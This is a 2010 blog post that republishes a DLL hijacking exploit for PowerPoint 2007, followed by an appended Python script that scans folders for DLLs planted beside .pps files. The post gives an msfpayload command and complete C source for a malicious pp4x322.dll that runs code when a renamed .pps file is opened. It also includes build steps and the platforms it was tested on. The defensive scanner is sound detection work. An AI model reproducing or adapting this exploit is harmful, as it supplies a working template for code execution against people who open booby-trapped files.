Microsoft Windows Power Point 2007 DLL Hijacking Exploit (pp4x322.dll)

25 08 2010

Today is a crazy day with everyone and their mother searching for DLL Hijacking Exploits. They are going quick, so get in before they are all gone. 🙂 Below is an exploit I found for .pps files in MS PowerPoint 2007. PowerPoint looks for pp4x322.dll and loads it. This will not work with a real .pps file, but it will work with a text file whose extension is changed from .txt to .pps. I have tested it on Windows 7 64bit and it works. Rapid7 has a great article on DLL Hijacking and it is a must read.

msfpayload windows/exec CMD=calc.exe D > pp4x322.dll

/*
Exploit Title: Microsoft Windows Power Point 2007 DLL Hijacking Exploit (pp4x322.dll)
Date: August 25, 2010
Author: monstream00 (monstream00 [at}
Modified storm's exploit for pp4x322.dll and used Rapid7 write up to find. Happy hunting.
Rapid7 write up:
Tested on: Windows 7 64bit, XP SP3 with MS Office PowerPoint 2007 SP2 MSO 12.0.6535.5002

gcc -shared -o pp4x322.dll powerpoint2007-DLL.c
.pps file affected.
*/

#include <windows.h>
#include <stdlib.h> /* exit() */

/* Proof-of-concept payload: start Calculator, then end the host process. */
int hax()
{
    WinExec("calc", 0);
    exit(0);
    return 0;
}

/* Called by the loader when the DLL is mapped into the process. */
BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpvReserved)
{
    hax();
    return 0;
}

Also see Corelan for an unofficial list of DLL Hijacking Exploits.
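A defender-side check for the condition this post describes, added here as an example and not part of the original post: it walks a directory tree and reports any DLL that shares a folder with a .pps file, flagging the DLL name given above and any .pps that lacks the OLE compound-file header (the post notes the trigger file is a renamed text file). The function names, the watchlist and the sample tree are constructed for illustration.

```python
import tempfile
from pathlib import Path

# Assumptions in this added example: the watchlist holds only the DLL name
# given in the post, and only .pps documents are considered.
WATCHED_DLLS = {"pp4x322.dll"}
DOC_EXTS = {".pps"}
OLE_MAGIC = bytes.fromhex("d0cf11e0a1b11ae1")  # start of a genuine binary .pps


def is_real_ole(path):
    """True if the file begins with the OLE compound-file signature."""
    with open(path, "rb") as fh:
        return fh.read(8) == OLE_MAGIC


def scan(root):
    """Report every DLL that shares a folder with a .pps document."""
    findings = []
    folders = [Path(root)] + sorted(p for p in Path(root).rglob("*") if p.is_dir())
    for folder in folders:
        files = sorted(f for f in folder.iterdir() if f.is_file())
        docs = [f for f in files if f.suffix.lower() in DOC_EXTS]
        for dll in (f for f in files if docs and f.suffix.lower() == ".dll"):
            findings.append({
                "folder": folder.name,
                "dll": dll.name,
                "known_name": dll.name.lower() in WATCHED_DLLS,
                "not_ole": [d.name for d in docs if not is_real_ole(d)],
            })
    return findings


def demo():
    """Scan a constructed sample tree built in a temporary directory."""
    with tempfile.TemporaryDirectory() as root:
        share, clean = Path(root, "share"), Path(root, "clean")
        share.mkdir()
        clean.mkdir()
        # Constructed files: a text file renamed to .pps beside a planted DLL,
        # and a folder holding only a document with a valid OLE header.
        (share / "slides.pps").write_text("not a presentation")
        (share / "PP4X322.DLL").write_bytes(b"MZ")
        (clean / "deck.pps").write_bytes(OLE_MAGIC + b"\x00" * 8)
        return scan(root)


if __name__ == "__main__":
    print(demo())
```

Pointing `scan()` at a file share or a downloads folder gives a quick triage list; a hit with `known_name` true and a non-empty `not_ole` list matches the setup described in the post.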



